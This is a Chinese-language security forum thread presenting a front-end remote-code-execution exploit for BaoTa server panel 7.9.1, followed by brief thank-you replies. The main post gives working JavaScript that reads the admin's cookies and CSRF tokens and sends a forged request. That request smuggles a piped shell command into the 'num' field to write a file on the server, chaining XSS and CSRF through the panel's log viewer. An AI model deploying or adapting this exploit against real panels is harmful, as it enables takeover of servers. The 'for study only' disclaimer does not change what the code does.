请选择 进入手机版 | 继续访问电脑版
查看: 39661|回复: 19

宝塔前台RCE-7.9.1版本

[复制链接]
匿名
匿名  发表于 2022-7-20 12:01:30 |阅读模式
声明:漏洞信息来自于网上,仅限用于漏洞复现学习。

这个漏洞稍微有点鸡肋,首先需要web目录,比如默认的/www/wwwroot/xxx/
然后需要调用远程的js文件,web目录自己更改
[AppleScript] 纯文本查看 复制代码
//JQuery preload (optional)
(function(){
var s = document.createElement('script');s.type = 'text/javascript';s.async = true;s.src = 'https://code.jquery.com/jquery-2.1.4.min.js';
(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(s);
})();
// cookie
let cookies = document.cookie;
function getCookie(sKey) {
if (!sKey) { return null; }
return decodeURIComponent(document.cookie.replace(new RegExp("(?:(?:^|.*;)\\s*" + encodeURIComponent(sKey).replace(/[\-\.\+\*]/g, "\\$&") + "\\s*\\=\\s*([^;]*).*$)|^.*$"), "$1")) || null;
}
all_headers = {
"Accept":"*/*",
"X-Requested-With":"XMLHttpRequest",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36",
"Connection":"close",
"Accept-Encoding":"gzip, deflate",
"dnt":"1",
"sec-gpc":"1",
"Cookie": cookies,
"x-cookie-token": getCookie('request_token'),
"Accept-Language":"zh-CN,zh;q=0.9,en;q=0.8",
"x-http-token": $('#request_token_head').attr('token'),
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8"
}
$.ajax({
url: "/ajax",
type: "get",
data:
{"action":"get_lines","filename":"/etc","num":"|echo 'BT RCE TEST'> /www/wwwroot/web目录/1.txt|"}
,
headers: all_headers,
success: function (data) {
console.info(data);
}
});


提交请求即可,修改agent头为:
游客,如果您要查看本帖隐藏内容请回复


鸡肋的地方来了,需要点击日志功能才可以触发写入文件
QQ20220720-120005@2x.png

漏洞原理:宝塔面板存在xss,通过远程调用js功能触发xss+csrf写入文件
回复

使用道具 举报

  • TA的每日心情
    开心
    2023-1-19 14:56
  • 签到天数: 139 天

    [LV.7]常住居民III

    发表于 2022-7-20 12:02:15 | 显示全部楼层
    刚到,抢位置
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2023-1-19 14:56
  • 签到天数: 139 天

    [LV.7]常住居民III

    发表于 2022-7-20 12:02:51 | 显示全部楼层
    90好久没上线了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    擦汗
    2022-7-20 12:31
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2022-7-20 12:42:17 | 显示全部楼层
    快看看
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    擦汗
    2022-7-20 12:32
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2022-7-20 12:45:50 | 显示全部楼层
    agent头是什么
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2022-9-10 19:59
  • 签到天数: 9 天

    [LV.3]偶尔看看II

    发表于 2022-7-20 13:15:23 | 显示全部楼层
    来学习了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2024-1-26 20:15
  • 签到天数: 23 天

    [LV.4]偶尔看看III

    发表于 2022-7-20 13:28:08 | 显示全部楼层
    谢谢大佬分享,学习
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2022-7-24 15:00
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2022-7-24 15:19:08 | 显示全部楼层
    不错,看看!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2022-7-24 22:20
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2022-7-24 22:21:35 | 显示全部楼层
    不错,看看!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2022-7-25 14:17
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2022-7-25 14:37:20 | 显示全部楼层
    学习一下
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-3-28 19:22 , Processed in 0.036199 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部